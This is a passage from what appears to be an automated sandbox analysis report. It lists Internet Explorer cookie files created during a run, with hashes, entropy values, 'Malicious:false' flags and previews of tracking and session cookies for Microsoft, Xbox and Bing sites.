                                                                                                                                                                                                              SHA1:3FCD40611D5C5A7CB02DFB321CE13E0459980D23
                                                                                                                                                                                                              SHA-256:39047E6385F2ED87994F5CC88DA8D3A768F8444C3E727E22872D558A48F81390
                                                                                                                                                                                                              SHA-512:5FFA02881F9D912B622744F89949EF9FFE10D489040F710C082B3B32F4EC644A4B72C32FB4A21B285B50B8BB5E6C317820241ABC8CF72422BF1BED4436EA3473
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:demdex.net/
                                                                                                                                                                                                              Preview: demdex.01605907676471159512670334142871795298.demdex.net/.2147484673.2424523264.30921891.668515267.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\JN8EQ29L.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):411
                                                                                                                                                                                                              Entropy (8bit):5.699548800636479
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:2vCl9968hg1urPWjARp+srRlC/uDsjPr+srRlC/un:2Ezgtsp+sF96+sFZ
                                                                                                                                                                                                              MD5:89B699DC8CA099C4C8CDCE567D65C9B3
                                                                                                                                                                                                              SHA1:4A4D2620CDCAA810209107B90DC63E99722BE1B3
                                                                                                                                                                                                              SHA-256:90012D61441830C8A0CC05E1F53C52493CD2AD569B3837BF75FED57ADE8C1866
                                                                                                                                                                                                              SHA-512:6221CE2D78FBAEE4923F63463AE5F3C7FDF343FB1C3A35D7EC943ECCBD0649AD45044BCED9CD297602C9CDE452FF675CC06D7739BB58FA297AF09B694D4A72E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: buid.0.ATkAMe_N-B6jSkuT5F9XHpElWhkrJ-4RRD9DjyhcE8tv1AcBAAA.AQABAAEAAAD--DLA3VO7QrddgJg7WevrFcIFjAi3kN5uQmbFFiIEHYYPBAwqv1uiZWNmbRuEDSGPNqC_X1zNiXt9ew4MLIRJzlqB8Pd9Smm1QZjilhinPG6eiuTf97bwnHEw1tvdxh8gAA.login.microsoftonline.com/.2147492865.4237647360.30891715.1850043162.30885756.*.fpc.AthaxQRrb49Njvg67b4XSZhqwEtIAQAAACzMLdgOAAAA.login.microsoftonline.com/.2147492865.4237647360.30891715.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\K5MPZVF7.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):226
                                                                                                                                                                                                              Entropy (8bit):4.9211970322234855
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:3uA20vMXWtNkf45cw+JjwXeJTVAWLtNwj0:vvMXWQpw+JjwcTVzLsY
                                                                                                                                                                                                              MD5:797ADFC224C279B69E8AD463DB624169
                                                                                                                                                                                                              SHA1:A9D5B42B74E7003C9E38D5369C84E2D871845788
                                                                                                                                                                                                              SHA-256:EFC739126D290A2D75E2EE09EA1ABC1108FF847EEE1A0A048FF1AC7E417FABF8
                                                                                                                                                                                                              SHA-512:7BBE6149C3588397886F624DB31898D965F379C4500A2192ED2374FC67695C2EC88ECF5979132518DD11F8C151CEB2D8770B2F5F40939C6AFB16D361E7E9267C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:www.xbox.com/
                                                                                                                                                                                                              Preview: mobileOverride.desktop.www.xbox.com/.1536.901635328.30959107.651512034.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.www.xbox.com/.1601.901635328.30959107.645996981.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MF41086H.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):473
                                                                                                                                                                                                              Entropy (8bit):4.7003347905115715
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVw0:vQJNmiprjOos690
                                                                                                                                                                                                              MD5:BD2A02548B93761D9D3F91A49595BD4E
                                                                                                                                                                                                              SHA1:F880B445351C7D10DCB34B46B6EECDBFC457D46B
                                                                                                                                                                                                              SHA-256:FF6DDDFFB28B1A625909B04F12BC1C4F2803274CC750B89E46237790DC3D4830
                                                                                                                                                                                                              SHA-512:9B3F9C58CF38ED6549E234289777E07D3E8427F2386243752EF9AF8BFFDAF9748874C54D43F495E9A0F4D5E4FC370EC16035DF214D3F892ACAA164EFE7B709AC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MJMT31SH.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                              Entropy (8bit):5.093351040585794
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXb+t0UUAZ+mTDMTV3G0vRmjFUvH/TDMTVvXKw+JjwfeTDMTVeh3n:lw1iLUDuzmjFUvHL8f+JKun
                                                                                                                                                                                                              MD5:011FCD32CDA585CA2DBB2A8FD95A4F2F
                                                                                                                                                                                                              SHA1:41EC87C0FFAF5F1379734303FCB8DDC7ABA9C32A
                                                                                                                                                                                                              SHA-256:01BACE053018C62FBA034CCD2BE3F2FF17314D6832D07F81A235A5A0D93E9F3D
                                                                                                                                                                                                              SHA-512:1AC6DF489D61F0CC36003786C70E7C9EBCEA84274163685C7548DFE9E4CBF6D373349F9D6B7B604E2DBA505BB0BD377449782D17E6B4CDD7848888E471DBCB96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.611635328.30959107.358600262.30885757.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620858037819.support.microsoft.com/.1601.962927744.30885761.151076426.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MTZC52GJ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):282
                                                                                                                                                                                                              Entropy (8bit):5.751987413236293
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NkvZ8l9v9n0NM68hgsUurPz664ATLZQA+suaRlhU6Um3n:2vCl9968hg1urPWjARp+srRlC/un
                                                                                                                                                                                                              MD5:1A330B2D8494D2D94D6D74F6EE666F77
                                                                                                                                                                                                              SHA1:05CF28CE20C55B206EF81A78D05613A76469EF39
                                                                                                                                                                                                              SHA-256:0465CD38661C023FD203930BB33E183425F71F41A191C102309C4B60FB8BC4B7
                                                                                                                                                                                                              SHA-512:773BA549E9D88B99E6B74FB819A126BF6A8F16392C5267E4EE0DADF551706FD4036BD33CEAB243E8D8EB99BA438C9633DD48BA9020B93A5CD59A68CD33132C54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: buid.0.ATkAMe_N-B6jSkuT5F9XHpElWhkrJ-4RRD9DjyhcE8tv1AcBAAA.AQABAAEAAAD--DLA3VO7QrddgJg7WevrFcIFjAi3kN5uQmbFFiIEHYYPBAwqv1uiZWNmbRuEDSGPNqC_X1zNiXt9ew4MLIRJzlqB8Pd9Smm1QZjilhinPG6eiuTf97bwnHEw1tvdxh8gAA.login.microsoftonline.com/.2147492865.4237647360.30891715.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NGHXCN13.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):541
                                                                                                                                                                                                              Entropy (8bit):5.096062599960572
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXb55UUAZ+mTDM4CGUvH/TDMTVvXKw+JjwfeTDMTVeh3n:lw1iV5UDzCGUvHL8f+JKun
                                                                                                                                                                                                              MD5:0EFCA113E9ED68862829F07C1DEF932A
                                                                                                                                                                                                              SHA1:72BCE630AF24FCD59E6EE2E214BD43EFF63B3DF7
                                                                                                                                                                                                              SHA-256:CC136915034415D0078672C4D9C0224D9C39DD4B6B3774A8776D1221E4FF9888
                                                                                                                                                                                                              SHA-512:D8A82003DB9DEE3DFFF887E005F3223306541A5E06BB0624B0D7CB0021E84734599EB30A40C533C479634A41A9476DEAB3BF3086B2B3A67E9F9C7A7391222D34
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.611635328.30959107.359068263.30885757.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1089.2379088128.30959182.362008276.30885757.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620858037819.support.microsoft.com/.1601.962927744.30885761.151076426.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NWA76CFG.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):545
                                                                                                                                                                                                              Entropy (8bit):4.739564653108581
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUcJTVtAMfl:vQJNmiprjOos693rl
                                                                                                                                                                                                              MD5:4C85D1B9DB0B31E3E04A683A0D80F511
                                                                                                                                                                                                              SHA1:1E35D0BC9442BB1F309215C1B0F7306FCF5767DD
                                                                                                                                                                                                              SHA-256:D5CCA6D15CDD2030FCDA574EAFCFBF197F605056B3B8A78F8E50E7E4DBB9C780
                                                                                                                                                                                                              SHA-512:C9EAE3CD7DF0E583926A74AC1C13C28CF20BAA52791F6FA0FF7464C648F835EC43642C0460F3F47BEEB3FEF2C235A31EFD97B7ED50F96131896E7B2B585A6DFB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1.xbox.com/.1600.2719088128.30959182.694510465.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\OT0BAFHU.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):113
                                                                                                                                                                                                              Entropy (8bit):4.682666654233757
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:fD6cIofHOVh62XRLIMG+tREXbXVZJShcSM1nlfiv:fOcZuVgkLIMZDEXbFihqlfM
                                                                                                                                                                                                              MD5:8A06CC020D4EA3D12C537F2E15127683
                                                                                                                                                                                                              SHA1:F99FCD0C74FCBEF6196C781F69FE6122A65F6A42
                                                                                                                                                                                                              SHA-256:CBCEDDC5F9EC33A6CF733130E70DF5B5FDC15DD08F93DDCE6F0EDCA943639232
                                                                                                                                                                                                              SHA-512:24613209008456D0E375D88D27BEAFD396DEAD9BF76E80186CF889874855BAB1664736519199B575B3172873A0B019B49E556906E5D979A44E9D0A7D485E20EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.2026602624.30959106.1777971036.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\P1TT0OF0.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):145
                                                                                                                                                                                                              Entropy (8bit):4.643018215396378
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:TOPwNWWrjB4LJuaw59HA+tRMVX6ENVLJShcSMu/v:Tyw+JjwXg+DMVX6Qqh3n
                                                                                                                                                                                                              MD5:B2124D75C941F0FD31698C0010988B92
                                                                                                                                                                                                              SHA1:656ADF43FD8295FC72B9E2409E572F52CE4EBA6E
                                                                                                                                                                                                              SHA-256:83E19C5DDE667010C577E2D88A80A0C5E751B90CAE50FD5A874F7B8E2AB6375A
                                                                                                                                                                                                              SHA-512:A3AD858A61B4CFD0621FCD8AB37871B90A3D4C2EBCDFF64FBFD6C80BA93F6F3AA42B50549DB8FF495CC321CB15D4297CF8BDAC0F013CD495CD88DD2D44CC7061
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Q7X6KR68.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                              Entropy (8bit):5.119559936207818
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:zUUAZ+mTDMTV3G0vRmjFUvH/TDMTVvXKw+JjwfeTDMTVeh3n:zUDuzmjFUvHL8f+JKun
                                                                                                                                                                                                              MD5:0691D4C993BD5FEB823317610822DF01
                                                                                                                                                                                                              SHA1:F9194E9CAD9A22A939BF3F2DCC4EF8372A427E7A
                                                                                                                                                                                                              SHA-256:B649FE20C8A966B1537B341DF70FC10BE61B8EA3A37BFF77ACE00001E37DAEEF
                                                                                                                                                                                                              SHA-512:C205F30A8CA9BD10F0B09AD763CA29B91729AFE85C67009BC2AD044C3DD5EA2BD6C37882ED0EBC44264C0F098BEAECC29FFA52320BAC8E0E13B6DBB2099C1580
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620858037819.support.microsoft.com/.1601.962927744.30885761.151076426.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TY4GVBMU.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                              Entropy (8bit):4.794439065490334
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDlgAuDMVXz9WtSkjfOl:Tyw+JjwDDM9qh3PhqlKDM9RWtSkj2l
                                                                                                                                                                                                              MD5:6EFF8F76DD98678DB6105EF94C7B2BBF
                                                                                                                                                                                                              SHA1:A3E3FABDE850D9B92AA9755B8259BE9CD00C4692
                                                                                                                                                                                                              SHA-256:157B324504A0CEE73C2A85593AE72A6B1AAB5E3165CEE6762CC2B83411F55DE3
                                                                                                                                                                                                              SHA-512:23F74E5EB54C456DE9009EEDED339A8133C66D9E15CE14078DA6FC90CB1D695B05BCB4E32287B654E371CEDFCB8643F24CECE6F61ADC3370CD16043377E68CF5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.1.microsoft.com/.1024.3521884928.30885882.291512766.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U85W34VC.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):410
                                                                                                                                                                                                              Entropy (8bit):5.704235505152883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:2vCl99H+Hd8Ra4iGQfArp+sIW5UUiPr+srRlC/un:2EH+Hd8YfWp+srfI+sFZ
                                                                                                                                                                                                              MD5:F07FCE03790413E813F2D937E0933172
                                                                                                                                                                                                              SHA1:47283947BC8850E54F8B235345C7EC1C1D70A8EA
                                                                                                                                                                                                              SHA-256:4C60A56D0A28E68F460B2769B15CE29F89380DAFF66A0A035CA251D2D5B8206C
                                                                                                                                                                                                              SHA-512:F7572C1508B45D383159C8D835A68C3367CF1588DE3C297FE891F19CC8EEEC2D403AC09EBFE8D3A1BE396665AA94550C04B27E6E62EC8E176F6FD5B24447DBD1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: buid.0.ATkAMe_N-B6jSkuT5F9XHpElWhkrJ-4RRD9DjyhcE8tv1AcBAAA.AQABAAEAAAD--DLA3VO7QrddgJg7WevrgeP_h0yjh0T-rIuPy1NC0yMXmzKoscb2te4Lf-qNcaA16NYOWVwg1wNnPmsdieKqUHJunW_sTrm80H4n7UtuLFtcQNaf3JmsrhzKk-a37mIgAA.login.microsoftonline.com/.2147492865.2762680064.30891716.364008307.30885757.*.fpc.AthaxQRrb49Njvg67b4XSZhqwEtIAQAAACzMLdgOAAAA.login.microsoftonline.com/.2147492865.4237647360.30891715.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UM514V05.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                              Entropy (8bit):4.828509183871553
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDl7DMVX4WtSFmRC6svhYDhWc2fw:Tyw+JjwDDM9qh3Phql7DM94WtSojsvhq
                                                                                                                                                                                                              MD5:8A0B915D9F9D4035253615A7572932B5
                                                                                                                                                                                                              SHA1:24683B5412C0994DFCB70176EC2525C7AF3A4B31
                                                                                                                                                                                                              SHA-256:E405225AF8C32BBE9798D76257E138C5274F67D7D69E784DEEFF62FFA31C759F
                                                                                                                                                                                                              SHA-512:E1DDCF6E2FD45ABC3D55F414131192FC7E92FE5FC869852FAEFF3AB4AC4EABB44F2F629B1D2BE101C635A20A6DD7F9FC20F26D1B8F519A3E1249F58E407F895B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:microsoft.com/
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.6.microsoft.com/.1024.3791884928.30885882.558510074.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.microsoft.com/.2147484673.1531103744.30964136.665512249.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\V3XIIXGJ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):167
                                                                                                                                                                                                              Entropy (8bit):4.6337713569185315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:vQJ2XArdafUQ2O+d2/T1N6ddQ0ehvRshUjsUcFTgkw8dfUVX6hN+HWjau1n:vQJldJXVYKdSlRC6svhwJVX6hc2T
                                                                                                                                                                                                              MD5:0CA50272F95218E5CA7FCD98E6B59FA2
                                                                                                                                                                                                              SHA1:8B4AC842436D48EE48388D316E530F1EF04B83E0
                                                                                                                                                                                                              SHA-256:E2453732897923563DDA2FC1417390076B18148309D7DCEE1EBE5EC3D112E762
                                                                                                                                                                                                              SHA-512:D794881AEE814FE3639E69C7E094E5E003089FDD7A058274D8789B7DD3289CE81D440B231814842A1F808F8FD4D418A19407C4D817BE4ECF9C96E5E63DEBBE57
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WMRVTUNH.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):357
                                                                                                                                                                                                              Entropy (8bit):4.716582854877232
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:vQJldJXVYKdSlRC6svhwJVX6hc2O6XHmOKdWTVt4M3IwwuqFnmWTVdcgWV3:vQJpXmhjsvhK9ic2O6PpTVtX4wXqtJTk
                                                                                                                                                                                                              MD5:5252802A0A65E443F92CFE36DB623731
                                                                                                                                                                                                              SHA1:4DECB3C5C89210D48908DDE88D11E65FFD640E15
                                                                                                                                                                                                              SHA-256:6A333BFA4B1A3F3F8A783EF603B4E8E83A576C5B4CA86DC38299BAA62E65CDDD
                                                                                                                                                                                                              SHA-512:340265E4D43A0612B0D15E6CC5DBF8EA919E9515C25421EEEC47E3160DDFAD41D1562EB28C71C1225491EA69115A02AF29ABB901565570B8D6559B2A4F0E100B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948.xbox.com/.1600.2072927744.30885761.642997943.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WPA8HU89.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                              Entropy (8bit):4.801572119258446
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Tyw+JjwXg+DMVX6Qqh3PhIhDl7DMVX4WtSF1:Tyw+JjwDDM9qh3Phql7DM94WtS/
                                                                                                                                                                                                              MD5:5D24A7A1A1A6ACECFEE0689B35F48E26
                                                                                                                                                                                                              SHA1:30D1092903EF9B20FB80414A8B70F52204A9CAA9
                                                                                                                                                                                                              SHA-256:75289C47B1D031DE8E5670A96FBF82E98E0E6EC8DF599E9BCD68848805C6FF24
                                                                                                                                                                                                              SHA-512:0185EB22A49D51C968E24FF371FFDEFE9747CB42E104FE5D31E84D4D6B1AE83F15FA6989CA95AE401ECC6008732B30A6829009D799B225007FC381012E9AA198
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MC1.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.microsoft.com/.1025.2106602624.30959106.1850043162.30885756.*.MS-CV.A9so15JmkkaOfhL8.6.microsoft.com/.1024.3791884928.30885882.558510074.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8LB2O0U.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                              Entropy (8bit):4.428745238868662
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:9Ms6svhfHMLU+UDW2IadSQ6f6svhfHMLUWc2fd70:KbsvhSVCW2Iadf6CsvhSPc2y
                                                                                                                                                                                                              MD5:0ED14F906907A6424B523CB5C96AF56E
                                                                                                                                                                                                              SHA1:BFA9ED5B5218A51401F807D8698F7EB813F4F649
                                                                                                                                                                                                              SHA-256:98ADC2FFFE4576500DCEC60188C4D1B55CA2427F2595BA922C66EC1C398CB9D8
                                                                                                                                                                                                              SHA-512:42BB08C4B9EEDA53D584EC267E8BD64A455165B502DDFD1541F31B8384B6DD5B25A4DCBA9B1952C5F03B1730FFEC4557DB160BF0294538EE1D433D0A52586D41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:c.bing.com/
                                                                                                                                                                                                              Preview: SRM_B.336584BA72BC6F9620B1948F76BC6EAC.c.bing.com/.2147484673.1501103744.30964136.636133931.30885757.*.SRM_I.336584BA72BC6F9620B1948F76BC6EAC.c.bing.com/.2147484673.1531103744.30964136.664512233.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\XK24HC1I.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):113
                                                                                                                                                                                                              Entropy (8bit):4.675280530912429
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:fD6cIofHOVh62XRLIMG+tREXbXVeZShcSMTV64/v:fOcZuVgkLIMZDEXbFeIh064n
                                                                                                                                                                                                              MD5:C845EADAB9AC258AE15E5B421B07AF02
                                                                                                                                                                                                              SHA1:4ABB2374339838DF8C087F6F7027DD6322622656
                                                                                                                                                                                                              SHA-256:3629F180DAB1F39E853CCDA363E11360369FCCE28758BEC1EFB080D44B8DE816
                                                                                                                                                                                                              SHA-512:A508C3894676A83089906F223FBD03191FF10C10EDFF2BE9E6D4FD7325319C823D8D27D9ADCE44519AF5D4059559E708999926FEEF3C4BBAFA912477E22FD4ED
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.2036602624.30959106.1780467040.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YFOBNMHE.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103
